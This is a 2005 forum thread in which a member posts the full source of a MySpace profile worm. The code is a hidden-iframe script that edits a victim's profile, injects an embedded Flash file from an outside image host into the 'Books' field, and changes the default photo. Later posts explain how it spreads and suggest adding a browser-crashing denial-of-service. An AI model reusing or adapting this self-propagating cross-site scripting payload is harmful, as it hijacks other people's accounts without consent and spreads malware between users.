1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

MySpace owned.. again?...

Discussion in 'Members' Lounge' started by VTECin5th, Oct 30, 2005.

  1. VTECin5th

    VTECin5th Administrator

    Messages:
    2,182
    Likes Received:
    4
    Joined:
    Apr 17, 2005
    Location:
    Phoenix Az
    So, i was looking at a friend's profile, and my picture was set to some gay white kid pointing or somethin, i thought hmm that was weird... so i sourced the page.
    Didn't see anything weird offhand... then a few minutes later i realized what was going on.
    I won't say how the call is being made, but i have the source code to the new myspace 'problem?', very similar to my methods, so i'm thinking it will probably die soon.
    Maybe not though, since they didn't fix anything last time, just made more people interested in how to get around their crappy filtering.
    Now i'm going to go try a couple things [​IMG]
    BTW: if you get infected, it's in the "Books" section.
    Code:
    <script>var pageId = 0;function ld(){if(pageId==0){frames['dynFrame'].location.href = 'http://editprofile.myspace.com/index.cfm?fuseaction=profile.interests';pageId++;}};function onFrameLoad(){if(frames['dynFrame']==null) return;if(pageId==1) { frames['dynFrame'].editInterest('books');pageId++;}else if(pageId==2) {frames['dynFrame'].document.forms[1].submit();pageId++;}else if(pageId == 3) { frames['dynFrame'].document.forms[1].interest.value = '<embed src=\"http://photobucket.com/albums/d110/pimpinainteasypl/alig.swf\" width=\"0\" height=\"0\" type=\"application/x-shockwave-flash\"></embed>';frames['dynFrame'].document.forms[1].submit();pageId++;}else if(pageId == 4) {frames['dynFrame'].location.href = 'http://editprofile.myspace.com/index.cfm?fuseaction=user.uploadphoto';pageId++;}
    else if(pageId==5) { frames['dynFrame'].document.forms[1].imageID.value = '280225360';frames['dynFrame'].document.forms[1].C.name = 'setDefault';frames['dynFrame'].document.forms[1].C.value = '-Set as default-';frames['dynFrame'].document.forms[1].C.click(); pageId++;}}</script></head><body><iframe id="dynFrame"onLoad="onFrameLoad()"name="dynFrame"src=""width="0"></iframe><script>ld()</script>
    
     
  2. Cashizslick

    Cashizslick !i!i!i!i!i!i!i!i!i!i!i!

    Messages:
    5,751
    Likes Received:
    37
    Joined:
    Aug 15, 2003
    ^ whats IT do?
     
  3. VTECin5th

    VTECin5th Administrator

    Messages:
    2,182
    Likes Received:
    4
    Joined:
    Apr 17, 2005
    Location:
    Phoenix Az
    Changes your default image, then embeds the worm in your profile.
    The worm feeds off photobucket and flash.
    The thing is, if people were smart they'd also embed the FireFox "0day" DoS into the page, so at least FF browsers would crash and die.
    :)
     
  4. Cashizslick

    Cashizslick !i!i!i!i!i!i!i!i!i!i!i!

    Messages:
    5,751
    Likes Received:
    37
    Joined:
    Aug 15, 2003

    SO what do i do to make sure phreakers like yourself dont destroy my myspace account lol?
     
  5. VTECin5th

    VTECin5th Administrator

    Messages:
    2,182
    Likes Received:
    4
    Joined:
    Apr 17, 2005
    Location:
    Phoenix Az
    Delete your myspace account.. or
    Use FireFox, turn off JS
    :)
    phreakers deal with phones lol
     
Verification:
Draft saved Draft deleted

Share This Page